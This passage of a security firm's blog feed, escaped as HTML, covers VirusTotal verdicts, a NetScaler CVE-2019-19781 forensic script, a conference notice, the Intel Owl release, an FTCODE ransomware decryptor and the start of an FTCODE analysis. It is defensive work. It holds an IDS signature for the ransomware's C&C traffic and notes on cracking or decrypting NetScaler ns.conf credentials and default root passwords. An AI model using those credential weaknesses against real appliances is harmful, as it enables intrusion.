        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Other than “Phishing”, there are other possible evaluations that can be found after an URL analysis.&lt;/p&gt;
&lt;p&gt;The “Malicious” and “Malware” detection are used to notify if a specific URL or domain was observed to serve malware or simply it was involved in cyber crime activities. Example:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1424px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/6ad5d67b27a6476819b2bbcd6c81444b/133ae/virustotal4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 60.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAABYlAAAWJQFJUiTwAAABK0lEQVR42pWS627DMAiF8/5P2U3q1mxJ4xgb4wt4J+kuaiutG8qPgPnggBiOJ5umtLrFe/JEUor1rqZ/saGappdRTlMzq56K83VZy7LmJPlXK6UMMbE7vp7HNziZQnY+r75GbrW2Rzb0pu/juPgVUud5PjsXmc2g/bENLZdEFIQB93/agLkjQzvnLMxcKyRz3H9uDDqvHG1Dznp4codnj+5EhMnXafaLuyGxIRH58VNqIgO6Y3HM28M2qlr3EaEbhXgVyZ+O6pbDO4w1xxhFEjI6eEf2nXcFpy/YOsWedlhS8t5j+L2oCgXLtXfbCl0+NMgZQ4HH+ZipxKCSd1iwb2qAETb1HNpFwh1ccX8ob0oca6kbjFAIAQe1de6G1WvTe9kcAZRdtUVJ2toHh3PAI22wZEIAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/6ad5d67b27a6476819b2bbcd6c81444b/133ae/virustotal4.png&quot;
        srcset=&quot;/website/static/6ad5d67b27a6476819b2bbcd6c81444b/804b2/virustotal4.png 384w,
/website/static/6ad5d67b27a6476819b2bbcd6c81444b/e5715/virustotal4.png 768w,
/website/static/6ad5d67b27a6476819b2bbcd6c81444b/133ae/virustotal4.png 1424w&quot;
        sizes=&quot;(max-width: 1424px) 100vw, 1424px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The “Suspicious” detection is used to notify when a specific URL or domain is or was probably involved in malicious activities. For these cases, the engine does not have a clear evidence so it just suggests that the site should be avoided as a precaution. Example:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1418px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/a842ec0abe44412e366c994b49acb7bf/bb543/virustotal5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 56.77083333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAABYlAAAWJQFJUiTwAAABHUlEQVR42pVS207DMAzN/38a4omnCdAe0MaYhKqmvsRO4wQnBanaw4AjJ3JSX85xEy7XhqCMICKt1b39ihAFH64vh+mkmmOUuZu6xUUR5Q5UNbxO708fx8fzM6uoNCBbwAANyZKU+whWyuF0vMTP1lpiylnbnxFMVYBIklXX2YX+J9mMCCV5emJmFwNIrr87AC5s/YHz3Pudtkh5Oy3nCyKmvpiXeZJeh+d59rnkAa+SUvJ9O3pp30OXKplYS7FB2yxjK7fKPdSJeDf3SzUS9mH1ZJEEsHjhanWtFgmdVt39Z4/pkwHI6+pHTwZGJx/GByWmXrW21Qqm7u8fw+isMUYiHp1HzFq+kxG2FzYoJfYp3tDeYrZ7a9Vpl1K+AApzhAgAyG8JAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/a842ec0abe44412e366c994b49acb7bf/bb543/virustotal5.png&quot;
        srcset=&quot;/website/static/a842ec0abe44412e366c994b49acb7bf/804b2/virustotal5.png 384w,
/website/static/a842ec0abe44412e366c994b49acb7bf/e5715/virustotal5.png 768w,
/website/static/a842ec0abe44412e366c994b49acb7bf/bb543/virustotal5.png 1418w&quot;
        sizes=&quot;(max-width: 1418px) 100vw, 1418px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The last case is the “Spam” detection that is used to notify when a specific URL or domain was embedded inside a lot of emails that were sent massively to many inboxes so it is a link that you probably do not want to click. Otherwise, IP addresses are tagged as “Spam” when they have been observed to send a lot of spam, so they are probably related to the presence of a spambot. Example:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1422px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/798f8459faa4591652009f47ab2a403c/2a08f/virustotal6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 56.25%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAABYlAAAWJQFJUiTwAAABGklEQVR42o1R20rEQAzt/3+c+CKIyCqoi7u9zKXT5jZJTVt82D4sG8KQTHI4OUlzae3c5TwmJlatZptr3eP71kQsT93pNfyQSEzS9dz10g/uPAS+YyLSfKXry+Xz+fw+EzJVRAZkf0XU/b41i9nb98dv6pfFQhhijCEEAFgesKYS8TwDg5p6bmbLw9Zw1Usbuy6NY0kxuZh+cP7kkg4Kb3/WtBGxawttR4hrrYoQTEx0WCz7MdjPoWsiXBnXbTs7Ikwle8FjHx4h+6kOE/oWfB0AaGtPxdl7dAW7akDcm/y4BdH0qNxpiUi3jYjp7D1mO5hyzv5uYC0w7VPcgIlKmVznBq4FZv1nvgFPW+EA9uo4jvsJnXnC2VT/ANvEhIit5/fwAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/798f8459faa4591652009f47ab2a403c/2a08f/virustotal6.png&quot;
        srcset=&quot;/website/static/798f8459faa4591652009f47ab2a403c/804b2/virustotal6.png 384w,
/website/static/798f8459faa4591652009f47ab2a403c/e5715/virustotal6.png 768w,
/website/static/798f8459faa4591652009f47ab2a403c/2a08f/virustotal6.png 1422w&quot;
        sizes=&quot;(max-width: 1422px) 100vw, 1422px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[netscaler_threathunter.sh]]></title><description><![CDATA[A bash2 compatible script to digital forensic and incident response on Citrix ADC]]></description><link>https://www.certego.net/blog/blog-netscaler/</link><guid isPermaLink="false">blog-netscaler</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Gabriele Pippi - Threat Research Lead Engineer]]></dc:creator><pubDate>Fri, 24 Jan 2020 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Hello everyone, this is Gabriele Pippi, from the Certego Purple Team.
Today we are ready to publish the tool we are using to perform digital forensic and incident response on Citrix Netscaler ADC based on FreeBSD.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Our point of view on CVE-2019-19781 exploitation&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;After the first mad release of the POC for CVE-2019-19781 by the github account @projectzeroindia and first exploitations, trustedsec and other members of the community provided the first details to carry out digital forensic and incident response operations.&lt;/p&gt;
&lt;p&gt;Our Incident Response Team from the first engagements has verified the following conditions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;All the Netscaler ADC analyzed run on FreeBSD kernel version. Unlike in FreeBSD core, there were several utilities installed on the machine, such bash2, used for this script.&lt;/li&gt;
&lt;li&gt;The code executed remotely with the CVE ran with nobody user, there were no easy privilege escalations and the persistence on the machine was easily circumscribed; we found cronjobs, php webshells and perl scripts.&lt;/li&gt;
&lt;li&gt;Some attackers tried to exfiltrate a file called ns.conf, which contains a large number of sensitive information, especially encrypted passwords and hashes. This is an advanced way to exfiltrate ns.conf.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;After the first engagements there were some important implications:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The hashes contained in the ns.conf file were already supported and crackable by hashcat since 2014.  Reference&lt;/li&gt;
&lt;li&gt;Some passwords in the ns.conf are encrypted with AES256-CBC or AES256-ECB algorithms using a well-known key, compiled in a library. These passwords can be decrypted immediately. Among these we also found AD domain admin. &lt;a href=&quot;https://dozer.nz/citrix-decrypt&quot;&gt;https://dozer.nz/citrix-decrypt&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;The default root password of Citrix Netscaler AMIs is set to the instance ID: this makes trivial a privilege escalation on all installations of this type. Reference&lt;/li&gt;
&lt;li&gt;Recently, some actors are starting to exploit this CVE for ransomware campaigns. Reference&lt;/li&gt;
&lt;/ol&gt;
&lt;h1&gt;&lt;strong&gt;Certego Netscaler Threathunter&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;I developed this bash2 compatible script in order to automate all checks and facilitate threat hunting operations.
The script is designed to provide output to an analyst who will then carry out the analysis.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Note #1: we take no responsibility for any improper use of this script. We recommend using it with caution on critical systems in production.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Note #2: except for its optional log file, the script does not perform any writing operations, does not need any installation and can also be launched in fileless mode.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h1&gt;&lt;em&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/em&gt;&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;Netscaler running on FreeBSD Kernel Version.&lt;/li&gt;
&lt;li&gt;nsroot or root privileges.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;Purpose&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;This script aims to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;validate patch of CVE-2019-19781.&lt;/li&gt;
&lt;li&gt;enumerate persistences and artifacts related to CVE-2019-19781.&lt;/li&gt;
&lt;li&gt;guide users to change ns.conf credentials to avoid future campaigns and to patch quickly.&lt;/li&gt;
&lt;li&gt;spot possible advanced privilege escalation.&lt;/li&gt;
&lt;li&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For further technical details and to download the script, please refer to the official github project Netscaler_Theathunter.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Author&lt;/strong&gt;:&lt;/h1&gt;
&lt;h3&gt;Gabriele Pippi - Threat Research Lead Engineer&lt;/h3&gt;</content:encoded></item><item><title><![CDATA[Certego a ITASEC20 | Ancona, 4-7 febbraio]]></title><link>https://www.certego.net/blog/event-1/</link><guid isPermaLink="false">event-1</guid><category><![CDATA[Event]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Pietro Delsante]]></dc:creator><pubDate>Tue, 14 Jan 2020 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Certego&lt;/strong&gt; ha il piacere di sostenere la quarta edizione di &lt;a href=&quot;https://itasec.it/about-itasec/&quot;&gt;ITASEC&lt;/a&gt;, la conferenza annuale sulla sicurezza informativa organizzata dal Laboratorio Nazionale di Cybersecurity del CINI – Consorzio Interuniversitario Nazionale per l’Informatica si svolgerà quest’anno ad Ancona dal 4 al 7 febbraio, in collaborazione con l’Università Politecnica delle Marche e l’Università degli Studi di Camerino.&lt;/p&gt;
&lt;p&gt;La conferenza, che si svolgerà nelle sale dell’UNIVPM, ha l’obiettivo di riunire ricercatori e professionisti provenienti dal mondo accademico, industriale e governativo per discutere le sfide emergenti e i bisogni consolidati nel campo della cybersecurity.
Al filone principale, dedicato alla scienza e tecnologia della sicurezza informatica, si affiancheranno poi workshop e tutorial riservati agli specifici aspetti economici, politici e legali della cybersecurity.
&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h3&gt;DOVE e QUANDO TROVARCI:&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Bernardino Grignaffini, CEO Certego, prenderà parte alla sessione “Nuove Sfide e Opportunità” il giorno 6 febbraio alle ore 9.45&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Vendor Session: Certego e VEM organizzeranno due incontri dedicati a Cybersecurity e Industrial Cyber Security nel corso di ITASEC.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Vi segnaliamo che tutte le sessioni plenarie e vendor session sono gratuite, mentre per partecipare ai workshop formativi sarà necessario versare una quota di iscrizione.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;L’ultima data utile per iscriversi e partecipare con la QUOTA RIDOTTA è il 22 GENNAIO 2020.&lt;/p&gt;
&lt;p&gt;Per maggiori informazioni visita il &lt;a href=&quot;https://itasec.it/about-itasec/&quot;&gt;sito ufficiale&lt;/a&gt; dell’evento e &lt;a href=&quot;https://consorzio-cini.formstack.com/forms/registration_to_ita_sec_2020&quot;&gt;PARTECIPA A ITASEC&lt;/a&gt;!
&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h3&gt;DATA&lt;/h3&gt;
&lt;p&gt;04 Febbraio 2020 - 07 Febbraio 2020&lt;/p&gt;
&lt;h3&gt;LUOGO&lt;/h3&gt;
&lt;p&gt;UNIVPM&lt;br&gt;
Via Brecce Bianche&lt;br&gt;
60131 Monte Dago (Ancona)&lt;br&gt;
Italia&lt;/p&gt;</content:encoded></item><item><title><![CDATA[New year, new tool: Intel Owl]]></title><description><![CDATA[We would like to open this new decade by releasing a new tool that is called Intel Owl. We hope that it could help the community, in particular those researchers that can not afford commercial solutions, in the generation of threat intelligence data, in a simple, scalable and reliable way.]]></description><link>https://www.certego.net/blog/new-year-new-tool-intel-owl/</link><guid isPermaLink="false">new-year-new-tool-intel-owl</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Matteo Lodi, Threat Intel Team Leader]]></dc:creator><pubDate>Wed, 01 Jan 2020 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;We would like to open this new decade by releasing a new tool that is called Intel Owl. We hope that it could help the community, in particular those researchers that can not afford commercial solutions, in the generation of threat intelligence data, in a simple, scalable and reliable way.&lt;/p&gt;
&lt;p&gt;Main features:&lt;/p&gt;
&lt;p&gt;modern &lt;em&gt;&lt;strong&gt;Django&lt;/strong&gt;&lt;/em&gt;-Python application: easy to understand and write code upon it&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;it can get data from multiple sources with &lt;em&gt;&lt;strong&gt;a single API request&lt;/strong&gt;&lt;/em&gt;.&lt;/li&gt;
&lt;li&gt;40 available analyzers that you can use to generate or retrieve data about a suspicious file or observable (IP, domain, …)&lt;/li&gt;
&lt;li&gt;official client available on Github: &lt;a href=&quot;https://github.com/mlodic/pyintelowl&quot;&gt;&lt;em&gt;&lt;strong&gt;PyIntelOwl&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;easily integrable with other tools thanks to the &lt;em&gt;&lt;strong&gt;REST API framework&lt;/strong&gt;&lt;/em&gt; and to the PyIntelOwl library.&lt;/li&gt;
&lt;li&gt;easily and completely &lt;em&gt;&lt;strong&gt;customizable&lt;/strong&gt;&lt;/em&gt;, both the APIs and the analyzers&lt;/li&gt;
&lt;li&gt;early compatibility with some of the AWS services. More in the future.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;&lt;strong&gt;fast and reliable deploy&lt;/strong&gt;&lt;/em&gt;: clone the project, set up the configuration and then you are ready to run it via docker-compose&lt;/li&gt;
&lt;li&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, we invite you to check the documentation and the code available on &lt;a href=&quot;https://github.com/intelowlproject/IntelOwl&quot;&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Feel free to ask everything it comes to your mind about the project to the author:&lt;/p&gt;
&lt;p&gt;Every suggestion or contribution is really appreciated.&lt;/p&gt;
&lt;p&gt;Keep hunting malware! We cheer on you :)&lt;/p&gt;</content:encoded></item><item><title><![CDATA[FTdecryptor: a simple password-based FTCODE decryptor]]></title><description><![CDATA[Hi there, this is Gabriele Pippi, from the Certego Purple Team. I want to share this simple password-based FTCODE decryptor]]></description><link>https://www.certego.net/blog/blog-ftdecryptor/</link><guid isPermaLink="false">blog-ftdecryptor</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Gabriele Pippi, Threat Research Lead Engineer]]></dc:creator><pubDate>Wed, 23 Oct 2019 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Hi there, this is Gabriele Pippi, from the Certego Purple Team.&lt;/p&gt;
&lt;p&gt;I want to share this simple password-based FTCODE decryptor.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Note #1: this must be considered a beta version of the script; the author assumes no responsibility for any damage caused by running it&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Note #2: currently the malware sends the password both as plain and cypher text; we believe the behavior may change soon as the malware is updated, and the plain text form may not be available anymore&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Note #3: decrypting files with an incorrect password may make them unrecoverable; so, we recommend taking a backup of the files before running the script.&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;Why should a password-based decryptor be useful?&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Since the first observed campaigns, &lt;a href=&quot;https://pages.github.com/&quot;&gt;documented in this article&lt;/a&gt;, we have noticed that FTCODE was sending the password in plaintext within the body of an HTTP post request to the C&amp;#x26;C.
Once implemented the relevant Suricata signatures, I decided to develop this tool internally, in order to make the decryption operation feasible.
In all of the cases we had the opportunity to put hands on, we were able to recover the encrypted files up to version 1018.1.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Network Traffic&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;In order to be able to decrypt the files successfully, it is necessary to intercept the contents of the POST request that the malware sends to the C&amp;#x26;C at infection time; an example of such request follows:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 709px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/4cbf5941f2cae00610f537397f136bcf/4d08a/FTdecryptor1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 51.5625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAAsTAAALEwEAmpwYAAABSUlEQVR42m1S25aDIAz0/3+vKghyE9Batdp2vTzuBM4+bUeNUcPMJFgMfd/HPmFY1/X1em3bhmtdt4z1+Xy/3/s/HMdR3Id7jH0MIeIIARzTNM3z/HggLvM0owAUKP2yOHhvrLXGCiGN1lh5XSc+0HVQRcYPYd9T2NM9Kw8+xHG8k/0YoXqe5wWCb7gS0o0eC/TMeaOV0koLIRhvbILvOpB2gEPm0ZGzTrUKOd6hfFmWAj5poVLWosppY402xIVoTNsSKXJ8M8ZqAnWplVnmpQBNVTMpZV2zqqwQGeOtlA0BUXCAcUFJQylryltZV2wcR7INGZsEYRs6xhhwZS/Is1qWRRmc06mTbWct9EBWlpUUEj3fbiX7c1FBo6KT/HCBDF5agsJ20rTRT/DYMo9phxh954ehz4MBMCpMzDmamnM0PfxLn89n3/dfBcQZl0UTsqEAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;FTdecryptor1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/4cbf5941f2cae00610f537397f136bcf/4d08a/FTdecryptor1.png&quot;
        srcset=&quot;/website/static/4cbf5941f2cae00610f537397f136bcf/804b2/FTdecryptor1.png 384w,
/website/static/4cbf5941f2cae00610f537397f136bcf/4d08a/FTdecryptor1.png 709w&quot;
        sizes=&quot;(max-width: 709px) 100vw, 709px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;ext&lt;/strong&gt;&lt;/em&gt; = extension of encrypted files
&lt;em&gt;&lt;strong&gt;ek&lt;/strong&gt;&lt;/em&gt; = password in plain text
&lt;em&gt;&lt;strong&gt;r1&lt;/strong&gt;&lt;/em&gt; = Base64 chunk containing the encrypted password&lt;/p&gt;
&lt;p&gt;In order to intercept the POST request, we developed the following Suricata signature, and deployed it to our network monitoring system:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:&quot;CERTEGO TROJAN FTCODE Registration Request (m.bompani)&quot;; 
flow:to_server; content:&quot;POST&quot;; http_method; content:&quot;ext=&quot;; 
http_client_body; content:&quot;guid=&quot;; 
http_client_body; content:&quot;ek=&quot;; http_client_body; classtype:trojan-activity; sid:9000931; rev:1;)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1&gt;&lt;strong&gt;What does the tool do?&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Given the extension and the password, the tool is able to recursively decrypt the encrypted files in all the mounted disks or in a given path.&lt;/p&gt;
&lt;p&gt;It offers the following features.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In-memory fileless utilization: it is possible by wrapping the script in a function, leveraging the built-in PowerShell cmdlet &lt;a href=&quot;https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.3&amp;#x26;viewFallbackFrom=powershell-6&quot;&gt;Invoke-Expression&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Logger: it traces the activities carried out, leveraging two cmdlets described at &lt;a href=&quot;https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.host/?view=powershell-7.3&amp;#x26;viewFallbackFrom=powershell-6&quot;&gt;Start/Stop Transcript&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Backup: it backs up all the files that the tool will try to decrypt.&lt;/li&gt;
&lt;li&gt;Some options were added to the script for possible future uses.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;Additional details&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;For further technical details and demonstrations, please refer to the official github project &lt;a href=&quot;https://github.com/certego/ransomware_decryptors/blob/master/FTdecryptor/README.md&quot;&gt;FTdecryptor&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;For further FTCODE details, please refer to this article &lt;a href=&quot;https://pages.github.com/&quot;&gt;FTCODE article&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Author&lt;/strong&gt;:&lt;/h1&gt;
&lt;h3&gt;Gabriele Pippi, Threat Research Lead Engineer&lt;/h3&gt;</content:encoded></item><item><title><![CDATA[Malware Tales: FTCODE]]></title><description><![CDATA[Hi everyone! Today we are talking about a new ransomware we spotted being distributed in the wild dubbed as FTCODE.]]></description><link>https://www.certego.net/blog/blog-ftcode/</link><guid isPermaLink="false">blog-ftcode</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Matteo Lodi, Threat Intelligence Lead Engineer; Marco Bompani, Security Analyst]]></dc:creator><pubDate>Tue, 01 Oct 2019 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;#1.the-threat&quot;&gt;&lt;em&gt;&lt;strong&gt;The Threat&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2.payload-delivery&quot;&gt;&lt;em&gt;&lt;strong&gt;Payload Delivery&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3.environment-preparation&quot;&gt;&lt;em&gt;&lt;strong&gt;Environment Preparation&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4.ransomware-attack&quot;&gt;&lt;em&gt;&lt;strong&gt;Ransomware Attack&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#5.version-changes&quot;&gt;&lt;em&gt;&lt;strong&gt;Version Changes&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#6.conclusion&quot;&gt;&lt;em&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#7.suricata-signatures&quot;&gt;&lt;em&gt;&lt;strong&gt;Suricata IDS Signatures&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#8.ioc&quot;&gt;&lt;em&gt;&lt;strong&gt;IoC&lt;/strong&gt;&lt;/em&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h1&gt;&lt;strong&gt;1.The Threat&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Malicious actors are evolving and trying new ways to infect computers.&lt;/p&gt;
&lt;p&gt;At the start of this year, a specific actor started to leverage a legitimate certified mail service, mainly used in Italy, called &lt;a href=&quot;https://en.wikipedia.org/wiki/Certified_email&quot;&gt;&lt;strong&gt;PEC&lt;/strong&gt;&lt;/a&gt;. This service is particularly trusted by its users and is commonly used to deliver electronic invoices. Therefore, it’s of special interest because it’s easier to lure potential victims with malicious emails that refer to fake invoices.&lt;/p&gt;
&lt;p&gt;Until the last week, the Gootkit banker was delivered as the final payload of the infection chain.&lt;/p&gt;
&lt;p&gt;During this year, the way to deliver this threat changed: they started to leverage a new simple but effective downloader dubbed as &lt;strong&gt;JasperLoader&lt;/strong&gt; to deliver upgrades and additional modules when needed. &lt;a href=&quot;https://blog.talosintelligence.com/jasperloader-targets-italy/&quot;&gt;Talos research&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;However, even if sophisticated, Gootkit is old malware. Also, it does not monetize fast and does require special interaction by the user. So, they have started experimenting with ransomware, maybe to understand if they can get more from this kind of infection.&lt;/p&gt;
&lt;p&gt;We are talking about a raw ransomware fully written in Powershell code, called &lt;strong&gt;FTCODE&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Even if the name could seem new, the first appearance of this threat was in 2013, as stated by &lt;a href=&quot;https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/&quot;&gt;Sophos&lt;/a&gt;. Then, almost nothing was seen for about 6 years. Strange, but we have to remember that technology changes. Windows XP was widespread at that time and, by default, Powershell is installed only from Windows 7 on. That can be a problem because actors need to install powershell itself before running ransomware. Also, cyber security was not mature as it is nowadays so, for instance, classic Zeus-like bankers were more effective.&lt;/p&gt;
